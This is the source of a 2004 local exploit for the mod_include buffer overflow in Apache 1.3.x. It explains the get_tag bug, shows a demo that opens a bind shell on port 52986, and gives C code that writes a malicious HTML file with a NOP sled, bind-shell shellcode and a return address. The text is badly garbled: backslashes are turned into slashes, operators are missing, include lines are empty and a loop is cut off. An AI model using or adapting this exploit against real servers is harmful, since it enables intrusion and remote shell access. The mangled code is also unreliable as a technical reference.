/ ************************************************** ***************************************
LOCAL EXPLOIT for MOD_INCLUDE OF APACHE 1.3.x *
Written by xcrzx / 18.10.2004/ *
Bug Found by xcrz / 18.10.2004/ *
*
Y0DAS Old Shao Lin Techniq Ownz u: Remember My Words *
http://lbyte.ru/16-masta_killa-16-mastakilla-mad.mp3 *
*
Success, Tested on Apache 1.3.31 Under Linux RH9.0 (Shrike) *
*********************************************************** ****************************** /
/ ************************************************** ***************************************
Technical Details: *
*
There is an overflow in get_tag function: *
*
Static char * get_tag (pool * p, file * in, char * tag, int tagbuf_len, int dodecode) *
{*
... *
Term = C; *
While (1) {*
GET_CHAR (in, c, null, p); *
[1] IF (t - tag == tagbuf_len) {*
* T = '/ 0'; *
Return NULL; *
} *
// Want to Accept / "AS A Valid Character within A String. // * IF (c == '//') {*
[2] * (t ) = C; // add backslash // *
GET_CHAR (in, c, null, p); *
IF (c == term) {// only if // *
[3] * (- t) = C; // Replace backslash only for terminator // *
} *
} *
Else IF (c == term) {*
Break; *
} *
[4] * (t ) = C; *
} *
* T = '/ 0'; *
... *
*
As we can see there is a [1] check to determine the end of tag buffer *
But this Check Can Be Skiped When [2] & [4] Conditions Will Be ocpared *
At the Same Time without [3] Condition. *
*
SO Attacker Can Create Malicious File To overflow Static Buffer, ON *
Which Tag Points Out and Execute Arbitrary Code with privilegies of *
httpd child process. **
FIX: *
[1 *] IF (t - tag> = tagbuf_len-1) {*
*
Notes: to activiVate mod_include you need write "xbithck on" in httpd.conf *
*
*********************************************************** ****************************** /
/ ************************************************** ***************************************
EXAMPLE OF WORK: *
*
[root @ blacksand htdocs] # Make 85Mod_include *
CC 85MOD_INCLUDE.C -O 85MOD_INCLUDE *
[root @ blacksand htdocs] # ./85MOD_INCLUDE 0XBFFF8196> Evil.html *
[root @ Blacksand HTDOCS] # chmod x evil.html *
[root @ blacksand htdocs] # Netstat -na | GREP 52986 *
[root @ blacksand htdocs] # Telnet localhost 8080 *
Trying 127.0.0.1 ... *
Connected to localhost. *
Escape Character is '^]'. *
Get /evil.html http / 1.0 *
^] *
Telnet> Q *
Connection closed. *
[root @ blacksand htdocs] # netstat -na | grep 52986 * tcp 0 0.0.0.0:52986 0.0.0.0:0:0:0:0:0:0:0:0:52986 0.0.0.0:0:56
[root @ blacksand htdocs] # *
*********************************************************** ****************************** /
/ ************************************************** ***************************************
NOTES: Ha1fsatan - TI 4LOVEK-KAKASHKA :))) Be CO0L As Always *
*********************************************************** ****************************** /
/ ************************************************** ***************************************
Personal Hello to my parents :) *
*********************************************************** ****************************** /
/ ************************************************** ***************************************
Public SHOUTZ TO: M00 SECURITY, ECH0 :), Lbyte, 0xBadc0ded and Otherz *
*********************************************************** ****************************** /
#include
#include
#include
#define evilbuf 8202
#define htmltext 1000
#define html_format " / n / nxcrzx 0wn u / n "
#define author "/ n *** local expedition for mod_include of apache 1.3.x by xcrz / 18.10.2004/ *** / n"
INT main (int Argc, char ** argv) {
Char HTML [Evilbuf HTMLText];
Char Evilbuf [Evilbuf 1];
// can be changed
Char shellcode [] =
// bind shell on 52986 port
"/ x31 / xc0"
"/ X31 / XDB / X53 / X43 / X43 / X50 / X89 / XE1 / XB0 / X66 / XCD / X80 / X43"
"/ x66 / xc7 / x44 / x24 / x02 / x24 / x04 / x6a / x10 / x51 / x50 / x89" "/ xe1 / xb0 / x66 / xcd / x80 / x43 / x43 / XB0 / X66 / XCD / X80 / X43 / X89 / X61 / X08 / XB0 "
"/ X66 / XCD / X80 / X93 / X31 / XC9 / XB1 / X03 / X49 / XB0 / X3F / XCD / X80 / X75 / XF9 / X68"
"/ x2f / x73 / x68 / x20 / x68 / x6e / x88 / x4c / x24 / x07 / x89 / xe3 / x51"
"/ x53 / x89 / xe1 / x31 / xd2 / xb0 / x0b / xcd / x80";
// Execve / Tmp / SH <- Your OWN Program
/ *
"/ x31 / xc0 / x31 / xdb / xb0 / x17 / xcd / x80"
"/ xb0 / x2e / xcd / x80 / Xeb / x15 / x5b / x31"
"/ xc0 / x88 / x43 / x07 / x89 / x5b / x08 / x89"
"/ X43 / X0C / X8D / X4B / X08 / X31 / XD2 / XB0"
"/ X0B / XCD / X80 / XE8 / XE6 / XFF / XFF / XFF"
"/ TMP / SH";
* /
Char NOP [] = "/ x90 / x40"; // Special NOPS;)
CHAR EVILPAD [] = "// crzcrzcrzcrzc"; // trick;)
INT PADDING, XPAD = 0;
INT I, FD;
Long Ret = 0xBfff8688;
IF (Argc> 1) RET = Strtoul (Argv [1], 0, 16);
Else {fprintf (stderr, author "/ nusage:% s
Padding = (Evilbuf-1-Strlen (Shellcode) -4-Strlen (EVILPAD) 2);
While (1) {
IF (padding% 2 == 0) {padding / = 2; Break;}
Else {padding -; xpad ;}
}
MEMSET (HTML, 0x0, SIZEOF HTML);
MEMSET (Evilbuf, 0x0, Sizeof Evilbuf);
For (i = 0; i Memcpy (Evilbuf Strlen (Evilbuf), & NOP, 2); For (i = 0; i Memcpy (Evilbuf Strlen (Evilbuf), (Evilbuf [Strlen (Evilbuf) -1] == NOP [1])? (& nop [0]): (& nop [1]), 1); Memcpy (Evilbuf Strlen (Evilbuf), & shellcode, SizeOf shellcode; Memcpy (Evilbuf Strlen (Evilbuf), & EvilPad, SizeOf EvilPad; * (long *) & evilbuf [Strlen (Evilbuf)] = RET; Sprintf (HTML, HTML_FORMAT, EVILBUF); Printf ("% s", HTML); Return 0; }
